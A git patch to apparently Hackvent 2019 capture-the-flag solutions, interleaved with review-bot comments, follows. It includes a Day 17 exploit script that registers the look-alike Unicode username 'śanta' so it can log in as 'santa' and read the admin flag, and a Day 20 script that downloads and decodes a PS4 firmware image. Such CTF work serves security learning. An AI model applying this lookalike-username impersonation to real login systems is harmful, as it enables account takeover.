From 45862b65901a573f9397eaefb4fae5c527bc9ba5 Mon Sep 17 00:00:00 2001
From: Roman Hergenreder
Date: Sun, 29 Dec 2019 18:40:38 +0100
Subject: [PATCH] Day 20 + 17 fix
---
 Day 17/exploit.py | 6 +++---
 Day 20/.gitignore | 1 +
 Day 20/decode.py | 31 +++++++++++++++++++++++++++++--
 3 files changed, 33 insertions(+), 5 deletions(-)
 create mode 100644 Day 20/.gitignore
diff --git a/Day 17/exploit.py b/Day 17/exploit.py
index a859fea..1744185 100644
--- a/Day 17/exploit.py
+++ b/Day 17/exploit.py
@@ -13,21 +13,21 @@ FLAG_PATTERN = re.compile("HV19\{[^}]*\}")
 # 1. register user santa
 res = SESSION.post(BASE_URL + "/register.php", data={"username": "śanta", "pwd": PASSWORD, "pwd2": PASSWORD})
 if res.status_code != 200 or "Registration successful!" not in res.text:
- print("Server returned: %d %s" % (res.status_code, res.status_text))
+ print("Server returned: %d %s" % (res.status_code, res.reason))
 print(res.text)
 exit(1)
 # 2. login
 res = SESSION.post(BASE_URL + "/login.php", data={"username": "santa", "pwd": PASSWORD})
 if res.status_code != 200 or "username not found or wrong password!" in res.text:
- print("Server returned: %d %s" % (res.status_code, res.status_text))
+ print("Server returned: %d %s" % (res.status_code, res.reason))
 print(res.text)
 exit(1)
 # 3. get flag
 res = SESSION.get(BASE_URL + "/admin.php")
 if res.status_code != 200 or "username not found or wrong password!" in res.text:
- print("Server returned: %d %s" % (res.status_code, res.status_text))
+ print("Server returned: %d %s" % (res.status_code, res.reason))
 exit(1)
 print(FLAG_PATTERN.search(res.text))
diff --git a/Day 20/.gitignore b/Day 20/.gitignore
new file mode 100644
index 0000000..ec2b23f
--- /dev/null
+++ b/Day 20/.gitignore
@@ -0,0 +1 @@
+PS4UPDATE\.PUP
diff --git a/Day 20/decode.py b/Day 20/decode.py
index 980c818..39f58a2 100644
--- a/Day 20/decode.py
+++ b/Day 20/decode.py
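Review bot: In `Day 17/exploit.py`, the final context line `print(FLAG_PATTERN.search(res.text))` prints a `re.Match` repr, or `None` when nothing matched, and the script still exits 0 in that case. The step-3 guard reuses the login failure string, so it probably never fires for `/admin.php` and a missing match is the only real failure signal. Suggest `m = FLAG_PATTERN.search(res.text)`, then `if m is None: exit(1)` and `print(m.group(0))`. The pattern shown in the hunk header would also be better as a raw string, `re.compile(r"HV19\{[^}]*\}")`, since `\{` in a normal string literal is an invalid escape that newer Python versions warn about.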
@@ -1,9 +1,36 @@
+#!/usr/bin/python
-byte_300 = [0xCE, 0x55, 0x95, 0x4E, 0x38, 0x0C5, 0x89, 0x0A5, 0x1B, 0x6F, 0x5E, 0x25, 0x0D2, 0x1D, 0x2A, 0x2B, 0x5E, 0x7B, 0x39, 0x14, 0x8E, 0x0D0, 0x0F0, 0x0F8, 0x0F8, 0x0A5]
+import requests
+import hashlib
+import os
+byte_300 = [0xCE, 0x55, 0x95, 0x4E, 0x38, 0x0C5, 0x89, 0x0A5, 0x1B, 0x6F, 0x5E, 0x25, 0x0D2, \
+ 0x1D, 0x2A, 0x2B, 0x5E, 0x7B, 0x39, 0x14, 0x8E, 0x0D0, 0x0F0, 0x0F8, 0x0F8, 0x0A5]
+
+EXPECTED_HASH = "f86d4f9d2c049547bd61f942151ffb55"
+INPUT_FILE = "PS4UPDATE.PUP"
 BUFFER_LENGTH = len(byte_300)
-with open("PS4UPDATE.PUP", "rb") as f:
+def downloadFile():
+ print("Downloading file…")
+ res = requests.get("https://psarchive.darksoftware.xyz/505Retail.PUP")
+ if res.status_code != 200:
+ print("Server returned: %d %s" % (res.status_code, res.reason))
+ exit(1)
+
+ buffer = res.content
+ hash = hashlib.md5(buffer).hexdigest()
+ if hash != EXPECTED_HASH:
+ print("Hash does not match:", hash)
+ exit(1)
+
+ with open(INPUT_FILE, "wb") as f:
+ f.write(buffer)
+
+if not os.path.isfile(INPUT_FILE):
+ downloadFile()
+
+with open(INPUT_FILE, "rb") as f:
 v29 = byte_300.copy()
 v14 = 4919;
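Review bot: The digest check in `downloadFile()` runs only on the download path, so a `PS4UPDATE.PUP` already on disk (left truncated by an interrupted run, or replaced) is parsed unverified by the `with open(INPUT_FILE, "rb")` block, whose body continues outside the hunk. The pin is also MD5, which is collision-broken and a weak integrity anchor for an image fetched from a third-party mirror; SHA-256 would be the safer choice. `requests.get` is called without a `timeout`, and `res.content` holds the whole image in memory before hashing. The sketch below hashes in chunks, streams to a `.part` file, renames only after the digest matches, and re-checks an existing file on every run; `EXPECTED_SHA256` is a placeholder to be replaced with the digest of the known-good image.

```python
EXPECTED_SHA256 = "<sha256-of-known-good-image>"  # placeholder: pin the real digest here
PART_FILE = INPUT_FILE + ".part"

def fileDigest(path):
    # Hash in 1 MiB chunks so the image is never held in memory whole.
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

def downloadFile():
    print("Downloading file…")
    with requests.get("https://psarchive.darksoftware.xyz/505Retail.PUP", stream=True, timeout=30) as res:
        # … unchanged: status-code check …
        with open(PART_FILE, "wb") as f:
            for chunk in res.iter_content(chunk_size=1 << 20):
                f.write(chunk)
    actual = fileDigest(PART_FILE)
    if actual != EXPECTED_SHA256:
        os.remove(PART_FILE)  # never leave an unverified image behind
        print("Hash does not match:", actual)
        exit(1)
    os.replace(PART_FILE, INPUT_FILE)

if not os.path.isfile(INPUT_FILE):
    downloadFile()
elif fileDigest(INPUT_FILE) != EXPECTED_SHA256:
    print("Hash does not match for existing file:", INPUT_FILE)
    exit(1)
```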